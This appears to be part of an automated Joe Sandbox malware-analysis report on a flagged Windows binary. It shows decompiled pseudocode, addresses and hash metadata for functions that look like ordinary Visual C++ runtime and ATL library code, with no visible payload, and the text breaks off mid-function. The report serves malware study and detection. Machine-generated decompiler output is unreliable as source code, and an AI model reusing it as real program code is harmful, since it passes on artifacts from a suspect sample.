                      0x0096e524
                      0x0096e55c
                      0x00000000
                      0x0096e55c
                      0x0096e526
                      0x0096e52c
                      0x0096e52f
                      0x00000000
                      0x00000000
                      0x0096e531
                      0x0096e541
                      0x0096e54c
                      0x0096e551
                      0x00000000
                      0x0096e551
                      0x0096e518
                      0x00000000
                      0x0096e518
                      0x0096e4ce
                      0x0096e4d5
                      0x00000000
                      0x00000000
                      0x0096e4d7
                      0x0096e4e7
                      0x0096e4f2
                      0x0096e4f7
                      0x00000000
                      0x0096e4f7
                      0x0096e471
                      0x0096e477
                      0x0096e483
                      0x0096e48e
                      0x0096e493
                      0x00000000
                      0x0096e493
                      0x0096e3f8
                      0x0096e3fc
                      0x00000000
                      0x00000000
                      0x0096e3fe
                      0x00000000
                      0x0096e35c
                      0x0096e361
                      0x0096e385
                      0x00000000
                      0x0096e385
                      0x0096e35a
                      0x0096e2fc
                      0x0096e300
                      0x00000000
                      0x00000000
                      0x0096e302
                      0x00000000
                      0x0096e2c5
                      0x0096e2ca
                      0x0096e2ee
                      0x0096e671
                      0x0096e67e
                      0x0096e67e

                      APIs
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 0096E449
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: TimevecTimevec::_std::_
                      • String ID: %ls$buffer_count == 0 || buffer != nullptr$common_vsprintf$format != nullptr$minkernel\crts\ucrt\src\appcrt\stdio\output.cpp
                      • API String ID: 4219598475-3439959449
                      • Opcode ID: 7f2c26ebb2b830a68f9af450275cb50369f07414b9b6beb1e313dd1e83e75cac
                      • Instruction ID: 304808cd7883eaba25a83749c81bfe9a3195a19131b931ec211e1670b8f50980
                      • Opcode Fuzzy Hash: 7f2c26ebb2b830a68f9af450275cb50369f07414b9b6beb1e313dd1e83e75cac
                      • Instruction Fuzzy Hash: 18C149B4944218CBDF24DF14CC91BAEB7B4BB91318F1081D9E61D67282DB749E84CF6A
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00955360 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 241COMMON
                      Download Yara Rule
                      C-Code - Quality: 92%
                      			E00955360(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, intOrPtr _a8, signed int _a12, intOrPtr _a16, signed int _a20, intOrPtr _a24) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr _t86;
				void* _t88;
				void* _t93;
				void* _t101;
				void* _t109;
				void* _t115;
				void* _t117;
				void* _t120;
				signed int _t160;
				void* _t181;
				void* _t182;

				_t180 = __esi;
				_t179 = __edi;
				_t160 = __edx;
				_t121 = __ebx;
				_v32 = 0xcccccccc;
				_v28 = 0xcccccccc;
				_v24 = 0xcccccccc;
				_v20 = 0xcccccccc;
				_v16 = 0xcccccccc;
				_v12 = 0xcccccccc;
				_v8 = 0xcccccccc;
				_v8 = __ecx;
				_v16 = 1;
				_v32 = _a24;
				_t184 = _v32;
				if(_v32 == 0) {
					__eflags = _a8 - 0x110;
					if(__eflags != 0) {
						L5:
						__eflags = _a8 - 0x111;
						if(_a8 != 0x111) {
							L9:
							__eflags = _a8 - 0x111;
							if(_a8 != 0x111) {
								L13:
								__eflags = _a8 - 0x111;
								if(_a8 != 0x111) {
									L17:
									__eflags = _a8 - 0x111;
									if(_a8 != 0x111) {
										L21:
										__eflags = _a8 - 0x111;
										if(_a8 != 0x111) {
											L25:
											__eflags = _a8 - 0x111;
											if(_a8 != 0x111) {
												L29:
												L33:
												_t86 = 0;
												L34:
												_push(_t160);
												E009D14C0(_t181, 0x955684);
												_t88 = _t86;
												return E009D1520(_t88, _t181 - _t182 + 0x1c);
											}
											_t160 = _a12 & 0x0000ffff;
											__eflags = (_t160 & 0x0000ffff) - 0xd2;
											if(__eflags != 0) {
												goto L29;
											}
											_v16 = 1;
											_t93 = E009D0980(_t121, _v8, _a16, _t179, _t180, __eflags, _a12 >> 0x00000010 & 0x0000ffff, _a12 & 0x0000ffff, _a16,  &_v16);
											_t160 = _a20;
											 *_t160 = _t93;
											__eflags = _v16;
											if(_v16 == 0) {
												goto L29;
											}
											_t86 = 1;
											goto L34;
										}
										__eflags = (_a12 & 0xffff) - 0xd4;
										if(__eflags != 0) {
											goto L25;
										}
										_v16 = 1;
										_t160 = _a12 >> 0x00000010 & 0x0000ffff;
										 *_a20 = E009D0840(_t121, _v8, _t160, _t179, _t180, __eflags, _t160, _a12 & 0x0000ffff, _a16,  &_v16);
										__eflags = _v16;
										if(_v16 == 0) {
											goto L25;
										}
										_t86 = 1;
										goto L34;
									}
									_t160 = _a12 & 0x0000ffff;
									__eflags = (_t160 & 0x0000ffff) - 0xd3;
									if(__eflags != 0) {
										goto L21;
									}
									_v16 = 1;
									_t101 = E009D0AC0(_t121, _v8, _a16, _t179, _t180, __eflags, _a12 >> 0x00000010 & 0x0000ffff, _a12 & 0x0000ffff, _a16,  &_v16);
									_t160 = _a20;
									 *_t160 = _t101;
									__eflags = _v16;
									if(_v16 == 0) {
										goto L21;
									}
									_t86 = 1;
									goto L34;
								}
								__eflags = (_a12 & 0xffff) - 0xd1;
								if(__eflags != 0) {
									goto L17;
								}
								_v16 = 1;
								_t160 = _a12 >> 0x00000010 & 0x0000ffff;
								 *_a20 = E009D0C00(_t121, _v8, _t160, _t179, _t180, __eflags, _t160, _a12 & 0x0000ffff, _a16,  &_v16);
								__eflags = _v16;
								if(_v16 == 0) {
									goto L17;
								}
								_t86 = 1;
								goto L34;
							}
							_t160 = _a12 & 0x0000ffff;
							__eflags = (_t160 & 0x0000ffff) - 2;
							if((_t160 & 0x0000ffff) != 2) {
								goto L13;
							}
							_v16 = 1;
							_t109 = E009D0D40(_v8, _a12 >> 0x00000010 & 0x0000ffff, _a12 & 0x0000ffff, _a16,  &_v16);
							_t160 = _a20;
							 *_t160 = _t109;
							__eflags = _v16;
							if(_v16 == 0) {
								goto L13;
							}
							_t86 = 1;
							goto L34;
						}
						__eflags = (_a12 & 0xffff) - 1;
						if(__eflags != 0) {
							goto L9;
						}
						_v16 = 1;
						_t160 = _a12 >> 0x00000010 & 0x0000ffff;
						 *_a20 = E009D0D90(_v8, _t180, __eflags, _t160, _a12 & 0x0000ffff, _a16,  &_v16);
						__eflags = _v16;
						if(_v16 == 0) {
							goto L9;
						}
						_t86 = 1;
						goto L34;
					}
					_v16 = 1;
					_t115 = E009D0E20(__ebx, _v8, __edi, __esi, __eflags, _a8, _a12, _a16,  &_v16);
					_t160 = _a20;
					 *_t160 = _t115;
					__eflags = _v16;
					if(_v16 == 0) {
						goto L5;
					}
					_t86 = 1;
					goto L34;
				}
				_t117 = E0094F1E0(0xb33748);
				E009423E0(__ebx, __edi, __esi, _t184, E009423B0( &_v28, "C:\\Users\\W7H64\\Desktop\\VCSamples-master\\VC2010Samples\\Attributes\\Advanced\\AtlDuck\\DuckDoerDlg.h", 0x26), _t117, 0, "Invalid message map ID (%i)\n", _a24);
				_t182 = _t182 + 0x14;
				if(0 == 0) {
					_t120 = L00994930(0, 2, L"C:\\Users\\W7H64\\Desktop\\VCSamples-master\\VC2010Samples\\Attributes\\Advanced\\AtlDuck\\DuckDoerDlg.h", 0x26, 0, "%ls", 0x9f40dc);
					_t182 = _t182 + 0x18;
					if(_t120 == 1) {
						asm("int3");
					}
				}
				goto L33;
			}





















                      0x00955360
                      0x00955360
                      0x00955360
                      0x00955360
                      0x0095536b
                      0x0095536e
                      0x00955371
                      0x00955374
                      0x00955377
                      0x0095537a
                      0x0095537d
                      0x00955380
                      0x00955383
                      0x0095538d
                      0x00955390
                      0x00955394
                      0x0095539b
                      0x009553a2
                      0x009553d8
                      0x009553d8
                      0x009553df
                      0x00955434
                      0x00955434
                      0x0095543b
                      0x00955490
                      0x00955490
                      0x00955497
                      0x009554ef
                      0x009554ef
                      0x009554f6
                      0x0095554d
                      0x0095554d
                      0x00955554
                      0x009555ac
                      0x009555ac
                      0x009555b3
                      0x00955607
                      0x0095565e
                      0x0095565e
                      0x00955660
                      0x00955660
                      0x0095566a
                      0x0095566f
                      0x0095567e
                      0x0095567e
                      0x009555b8
                      0x009555c1
                      0x009555c6
                      0x00000000
                      0x00000000
                      0x009555c8
                      0x009555f0
                      0x009555f5
                      0x009555f8
                      0x009555fa
                      0x009555fe
                      0x00000000
                      0x00000000
                      0x00955600
                      0x00000000
                      0x00955600
                      0x00955561
                      0x00955567
                      0x00000000
                      0x00000000
                      0x00955569
                      0x00955588
                      0x0095559a
                      0x0095559c
                      0x009555a0
                      0x00000000
                      0x00000000
                      0x009555a2
                      0x00000000
                      0x009555a2
                      0x009554fb
                      0x00955504
                      0x00955509
                      0x00000000
                      0x00000000
                      0x0095550b
                      0x00955533
                      0x00955538
                      0x0095553b
                      0x0095553d
                      0x00955541
                      0x00000000
                      0x00000000
                      0x00955543
                      0x00000000
                      0x00955543
                      0x009554a4
                      0x009554aa
                      0x00000000
                      0x00000000
                      0x009554ac
                      0x009554cb
                      0x009554dd
                      0x009554df
                      0x009554e3
                      0x00000000
                      0x00000000
                      0x009554e5
                      0x00000000
                      0x009554e5
                      0x00955440
                      0x00955449
                      0x0095544c
                      0x00000000
                      0x00000000
                      0x0095544e
                      0x00955476
                      0x0095547b
                      0x0095547e
                      0x00955480
                      0x00955484
                      0x00000000
                      0x00000000
                      0x00955486
                      0x00000000
                      0x00955486
                      0x009553ec
                      0x009553ef
                      0x00000000
                      0x00000000
                      0x009553f1
                      0x00955410
                      0x00955422
                      0x00955424
                      0x00955428
                      0x00000000
                      0x00000000
                      0x0095542a
                      0x00000000
                      0x0095542a
                      0x009553a4
                      0x009553be
                      0x009553c3
                      0x009553c6
                      0x009553c8
                      0x009553cc
                      0x00000000
                      0x00000000
                      0x009553ce
                      0x00000000
                      0x009553ce
                      0x00955619
                      0x0095562f
                      0x00955634
                      0x00955639
                      0x00955650
                      0x00955655
                      0x0095565b
                      0x0095565d
                      0x0095565d
                      0x0095565b
                      0x00000000

                      APIs
                      • _Smanip.LIBCPMTD ref: 00955629
                        • Part of subcall function 009423E0: @_RTC_CheckStackVars@8.LIBCMTD ref: 00942473
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 0095566A
                      Strings
                      • %ls, xrefs: 00955640
                      • Invalid message map ID (%i), xrefs: 0095560D
                      • C:\Users\W7H64\Desktop\VCSamples-master\VC2010Samples\Attributes\Advanced\AtlDuck\DuckDoerDlg.h, xrefs: 00955649
                      • C:\Users\W7H64\Desktop\VCSamples-master\VC2010Samples\Attributes\Advanced\AtlDuck\DuckDoerDlg.h, xrefs: 00955621
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: CheckStackVars@8$Smanip
                      • String ID: %ls$C:\Users\W7H64\Desktop\VCSamples-master\VC2010Samples\Attributes\Advanced\AtlDuck\DuckDoerDlg.h$C:\Users\W7H64\Desktop\VCSamples-master\VC2010Samples\Attributes\Advanced\AtlDuck\DuckDoerDlg.h$Invalid message map ID (%i)
                      • API String ID: 3890940529-3131995353
                      • Opcode ID: 555ad6447f75f7364955d52203f26ebfa392c53dfe7198bd1ea5e0cfebc00d28
                      • Instruction ID: ae351a7525042bd294877f373c18bae6cd4504acc1f04a402f39f54b0f6a6ff5
                      • Opcode Fuzzy Hash: 555ad6447f75f7364955d52203f26ebfa392c53dfe7198bd1ea5e0cfebc00d28
                      • Instruction Fuzzy Hash: D2919BB090460AEFDB14DF5AC862BFE73B9EF84301F508578F9159B281D6789998CF50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00948100 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 169COMMON
                      Download Yara Rule
                      C-Code - Quality: 81%
                      			E00948100(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, CHAR* _a4, signed int _a8, intOrPtr _a12, CHAR** _a16) {
				signed int _v8;
				intOrPtr _v12;
				CHAR** _v16;
				CHAR* _v20;
				CHAR* _v24;
				intOrPtr _v28;
				char _v64;
				CHAR* _v72;
				CHAR* _v76;
				char _v84;
				signed int _t64;
				CHAR* _t70;
				void* _t72;
				CHAR* _t81;
				CHAR* _t83;
				CHAR* _t87;
				CHAR* _t95;
				void* _t100;
				intOrPtr _t104;
				signed int _t106;
				CHAR* _t132;
				void* _t134;
				void* _t141;
				void* _t142;
				signed int _t144;
				void* _t145;
				void* _t146;

				_t143 = __esi;
				_t100 = __ebx;
				_push(__ecx);
				_t141 =  &_v84;
				memset(_t141, 0xcccccccc, 0x14 << 2);
				_t146 = _t145 + 0xc;
				_t142 = _t141 + 0x14;
				_pop(_t104);
				_t64 =  *0xa0600c; // 0x5d529087
				_v8 = _t64 ^ _t144;
				_v12 = _t104;
				if(_a16 != 0) {
					_v16 = _a16;
					_t132 =  *(_a4 + _a8 * 8);
					 *_v16 = _t132;
					__eflags =  *_v16;
					if( *_v16 != 0) {
						_t106 = _a8;
						_t132 = _a4;
						__eflags = _t132[4 + _t106 * 8] & 0x000000ff;
						if((_t132[4 + _t106 * 8] & 0x000000ff) == 0) {
							L25:
							_t70 = 0;
							__eflags = 0;
						} else {
							E0094E030(_a12);
							_v20 =  *_v16;
							 *_v16 = 0;
							while(1) {
								_t132 =  *_v20;
								__eflags = _t132;
								if(_t132 == 0) {
									break;
								}
								__eflags =  *_v20 - 0x25;
								if( *_v20 != 0x25) {
									E0094E0B0(_t100, _a12, _t142, _t143, _v20);
									goto L23;
								} else {
									_t143 = _t146;
									_t132 = _v20;
									_t83 = CharNextA(_t132);
									__eflags = _t146 - _t146;
									_v20 = E009D1520(_t83, _t146 - _t146);
									_t117 =  *_v20;
									__eflags =  *_v20 - 0x25;
									if( *_v20 != 0x25) {
										_t87 = E00951F90(_t117, _v20, 0x25);
										_t146 = _t146 + 8;
										_v24 = _t87;
										__eflags = _v24;
										if(__eflags != 0) {
											_v28 = _v24 - _v20;
											__eflags = _v28 - 0x1f;
											if(__eflags <= 0) {
												E00942750(_t100, _t142, _t143, __eflags,  &_v64, 0x20, _v20, _v28);
												_t146 = _t146 + 0x10;
												_t132 =  &_v64;
												_v72 = E009473F0(_v12 + 4, _t143, __eflags, _t132);
												__eflags = _v72;
												if(_v72 != 0) {
													_v76 = 0;
													while(1) {
														__eflags = _v72[_v76];
														if(_v72[_v76] == 0) {
															break;
														}
														E0094E0B0(_t100, _a12, _t142, _t143,  &(_v72[_v76]));
														_t95 =  &(_v76[1]);
														__eflags = _t95;
														_v76 = _t95;
													}
													_v20 = _v24;
													goto L21;
												} else {
													_t70 = 0x80004005;
												}
											} else {
												_t70 = 0x80004005;
											}
										} else {
											_push("Error : closing \'%%\' found\n");
											_push(0);
											_push(E0094F1F0(0xb337ac));
											_push(E009423B0( &_v84, "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlplus.h", 0x170));
											E009423E0(_t100, _t142, _t143, __eflags);
											_t146 = _t146 + 0x10;
											_t70 = 0x80004005;
										}
									} else {
										E0094E0B0(_t100, _a12, _t142, _t143, _v20);
										L21:
										L23:
										_t143 = _t146;
										_t81 = CharNextA(_v20);
										__eflags = _t146 - _t146;
										_v20 = E009D1520(_t81, _t146 - _t146);
										continue;
									}
								}
								goto L26;
							}
							E0094E0B0(_t100, _a12, _t142, _t143, _v20);
							goto L25;
						}
					} else {
						_t70 = 1;
					}
				} else {
					_t70 = 0x80070057;
				}
				L26:
				E009D14C0(_t144, 0x948310);
				_t72 = _t70;
				_t134 = _t132;
				return E009D1520(E00957280(_t72, _t100, _v8 ^ _t144, _t134, _t142, _t143), _t144 - _t146 + 0x50);
			}






























                      0x00948100
                      0x00948100
                      0x00948108
                      0x00948109
                      0x00948116
                      0x00948116
                      0x00948116
                      0x00948118
                      0x00948119
                      0x00948120
                      0x00948123
                      0x0094812a
                      0x00948139
                      0x00948145
                      0x00948148
                      0x0094814d
                      0x00948150
                      0x0094815c
                      0x0094815f
                      0x00948167
                      0x00948169
                      0x009482de
                      0x009482de
                      0x009482de
                      0x0094816f
                      0x00948172
                      0x0094817c
                      0x00948182
                      0x00948188
                      0x0094818b
                      0x0094818e
                      0x00948190
                      0x00000000
                      0x00000000
                      0x0094819c
                      0x0094819f
                      0x009482b2
                      0x00000000
                      0x009481a5
                      0x009481a5
                      0x009481a7
                      0x009481ab
                      0x009481b1
                      0x009481b8
                      0x009481be
                      0x009481c1
                      0x009481c4
                      0x009481dd
                      0x009481e2
                      0x009481e5
                      0x009481e8
                      0x009481ec
                      0x0094822b
                      0x0094822e
                      0x00948232
                      0x0094824c
                      0x00948251
                      0x00948254
                      0x00948263
                      0x00948266
                      0x0094826a
                      0x00948273
                      0x00948285
                      0x0094828e
                      0x00948290
                      0x00000000
                      0x00000000
                      0x0094829c
                      0x0094827f
                      0x0094827f
                      0x00948282
                      0x00948282
                      0x009482a6
                      0x00000000
                      0x0094826c
                      0x0094826c
                      0x0094826c
                      0x00948234
                      0x00948234
                      0x00948234
                      0x009481ee
                      0x009481ee
                      0x009481f3
                      0x009481ff
                      0x00948212
                      0x00948213
                      0x00948218
                      0x0094821b
                      0x0094821b
                      0x009481c6
                      0x009481cd
                      0x009482a9
                      0x009482b7
                      0x009482b7
                      0x009482bd
                      0x009482c3
                      0x009482ca
                      0x00000000
                      0x009482ca
                      0x009481c4
                      0x00000000
                      0x0094819f
                      0x009482d9
                      0x00000000
                      0x009482d9
                      0x00948152
                      0x00948152
                      0x00948152
                      0x0094812c
                      0x0094812c
                      0x0094812c
                      0x009482e0
                      0x009482ea
                      0x009482ef
                      0x009482f0
                      0x0094830a

                      APIs
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 009482EA
                      Strings
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlplus.h, xrefs: 00948205
                      • Error : closing '%%' found, xrefs: 009481EE
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: CheckStackVars@8
                      • String ID: C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlplus.h$Error : closing '%%' found
                      • API String ID: 930174750-1365711956
                      • Opcode ID: 00e83f767e1e99aea3c72084a3a097e28d79783fbc260481c1bfc8db674adbac
                      • Instruction ID: ca2f8814615a9e4bac10077b088f9a21f8657e7609e3d5cc5ed36262266cdaf1
                      • Opcode Fuzzy Hash: 00e83f767e1e99aea3c72084a3a097e28d79783fbc260481c1bfc8db674adbac
                      • Instruction Fuzzy Hash: 0F515A71E04219DFDB04EFA8C891FBFB7B5BF88340F104919E926AB351DA74A941CB90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00959CD0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 145COMMON
                      Download Yara Rule
                      C-Code - Quality: 80%
                      			E00959CD0(void* __eflags, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed char _v5;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				signed char _v48;
				intOrPtr _v52;
				char _v56;
				intOrPtr _t127;
				void* _t149;
				void* _t152;

				_v5 = 0;
				_v48 = 1;
				 *_a4 = E009CF650( *_a4);
				_v12 = _a8 - 8;
				_v16 = _v12 + 0x18;
				_v24 =  *(_v12 + 0x10) ^  *0xa0600c;
				E00959C70(_v24, _v16);
				E0095E290(_v16, _a12);
				_t152 = _t149 + 0x10;
				if(( *(_a4 + 4) & 0x00000066) != 0) {
					if( *((intOrPtr*)(_v12 + 0x14)) != 0xfffffffe) {
						E0095E4E0(_v12 + 8, 0xfffffffe, _v16, 0xa0600c);
						_v5 = 1;
					}
					goto L19;
				} else {
					_v56 = _a4;
					_v52 = _a12;
					 *((intOrPtr*)(_v12 + 4)) =  &_v56;
					_v20 =  *((intOrPtr*)(_v12 + 0x14));
					while(_v20 != 0xfffffffe) {
						_v28 = _v24 + 0x10 + _v20 * 0xc;
						_v32 =  *((intOrPtr*)(_v28 + 4));
						_v44 =  *_v28;
						if(_v32 == 0) {
							L15:
							_v20 = _v44;
							continue;
						}
						_v36 = E0095E480(_v32, _v16);
						_v5 = 1;
						if(_v36 >= 0) {
							if(_v36 > 0) {
								if( *_a4 == 0xe06d7363 &&  *0x9d8790 != 0) {
									_t96 = E009CEA70(0x9d8790);
									_t152 = _t152 + 4;
									if(_t96 != 0) {
										_t127 =  *0x9d8790; // 0x95b0e0
										_v40 = _t127;
										 *0x9d62b0(_a4, 1);
										_t96 = _v40();
										_t152 = _t152 + 8;
									}
								}
								E0095E4C0(_t96, _v12 + 8, _a4);
								if( *((intOrPtr*)(_v12 + 0x14)) != _v20) {
									E0095E4E0(_v12 + 8, _v20, _v16, 0xa0600c);
								}
								 *((intOrPtr*)(_v12 + 0x14)) = _v44;
								E00959C70(_v24, _v16);
								_t152 = _t152 + 8;
								E0095E4A0();
							}
							goto L15;
						}
						_v48 = 0;
						break;
					}
					L19:
					if((_v5 & 0x000000ff) != 0) {
						E00959C70(_v24, _v16);
					}
					return _v48;
				}
			}



















                      0x00959cd6
                      0x00959cda
                      0x00959cf2
                      0x00959cfa
                      0x00959d03
                      0x00959d12
                      0x00959d1d
                      0x00959d29
                      0x00959d2e
                      0x00959d3a
                      0x00959e74
                      0x00959e8a
                      0x00959e8f
                      0x00959e8f
                      0x00000000
                      0x00959d40
                      0x00959d43
                      0x00959d49
                      0x00959d52
                      0x00959d5b
                      0x00959d66
                      0x00959d7b
                      0x00959d84
                      0x00959d8c
                      0x00959d93
                      0x00959e66
                      0x00959d63
                      0x00000000
                      0x00959d63
                      0x00959da4
                      0x00959da7
                      0x00959daf
                      0x00959dc6
                      0x00959dd5
                      0x00959de5
                      0x00959dea
                      0x00959def
                      0x00959df7
                      0x00959dfd
                      0x00959e03
                      0x00959e09
                      0x00959e0c
                      0x00959e0c
                      0x00959def
                      0x00959e18
                      0x00959e26
                      0x00959e3a
                      0x00959e3a
                      0x00959e45
                      0x00959e50
                      0x00959e55
                      0x00959e61
                      0x00959e61
                      0x00000000
                      0x00959dc6
                      0x00959db1
                      0x00000000
                      0x00959db1
                      0x00959e93
                      0x00959e99
                      0x00959ea3
                      0x00959ea8
                      0x00959eb1
                      0x00959eb1

                      APIs
                      • _ValidateLocalCookies.LIBCMTD ref: 00959D1D
                      • ___except_validate_context_record.LIBVCRUNTIMED ref: 00959D29
                        • Part of subcall function 0095E290: __guard_icall_checks_enforced.LIBCMTD ref: 0095E296
                      • __IsNonwritableInCurrentImage.LIBCMTD ref: 00959DE5
                      • _ValidateLocalCookies.LIBCMTD ref: 00959E50
                      • _ValidateLocalCookies.LIBCMTD ref: 00959EA3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record__guard_icall_checks_enforced
                      • String ID: csm
                      • API String ID: 3439031638-1018135373
                      • Opcode ID: 3362872983b7947c2892152e2075070b57f5e7a8612f4c3bd441ed84394739bd
                      • Instruction ID: aafb62e96db6f572ed9f64d08218fe791effe96448d29ebc4f5a5a2ab3a83a3a
                      • Opcode Fuzzy Hash: 3362872983b7947c2892152e2075070b57f5e7a8612f4c3bd441ed84394739bd
                      • Instruction Fuzzy Hash: AB516074E00209EFDB08DF95D881AAEBBB5FF88305F108558E8156B391D731EA89CF91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 009A9120 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 133timeCOMMON
                      Download Yara Rule
                      C-Code - Quality: 97%
                      			E009A9120(intOrPtr _a4) {
				char _v8;
				signed int* _v12;
				char _v16;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t40;
				void* _t41;
				signed char _t43;
				void* _t52;
				void* _t54;
				void* _t65;
				intOrPtr _t89;
				void* _t100;
				void* _t102;
				void* _t103;

				_t105 = _a4;
				if(_a4 == 0) {
					_t65 = L00994930(_t105, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\_sftbuf.cpp", 0x26, 0, L"%ls", L"public_stream != nullptr");
					_t100 = _t100 + 0x18;
					if(_t65 == 1) {
						asm("int3");
					}
				}
				E00976E20( &_v8, _a4);
				_t37 = E009BDA70( &_v8, E009A8780(E0097C080( &_v8)));
				_t102 = _t100 + 8;
				if(_t37 != 0) {
					_t38 = E0097C080( &_v8);
					_t39 = E009A8A50(1);
					_t103 = _t102 + 4;
					__eflags = _t38 - _t39;
					if(_t38 != _t39) {
						_t40 = E0097C080( &_v8);
						_t41 = E009A8A50(2);
						_t103 = _t103 + 4;
						__eflags = _t40 - _t41;
						if(_t40 != _t41) {
							return 0;
						}
						_v12 = 0xb31190;
						L10:
						_t89 =  *0xb31184; // 0x0
						 *0xb31184 = _t89 + 1;
						_t43 = E009A9000( &_v8);
						__eflags = _t43 & 0x000000ff;
						if((_t43 & 0x000000ff) == 0) {
							E009A9080( &_v8, 0x282);
							__eflags =  *_v12;
							if( *_v12 == 0) {
								 *_v12 = E0099C129(L0095BF60( &_v16, E00999580(0x1000, 2, "minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\_sftbuf.cpp", 0x40)));
								E0095BFA0( &_v16);
							}
							__eflags =  *_v12;
							if( *_v12 != 0) {
								(E00977320( &_v8))[1] =  *_v12;
								 *(E00977320( &_v8)) =  *_v12;
								(E00977320( &_v8))[2] = 0x1000;
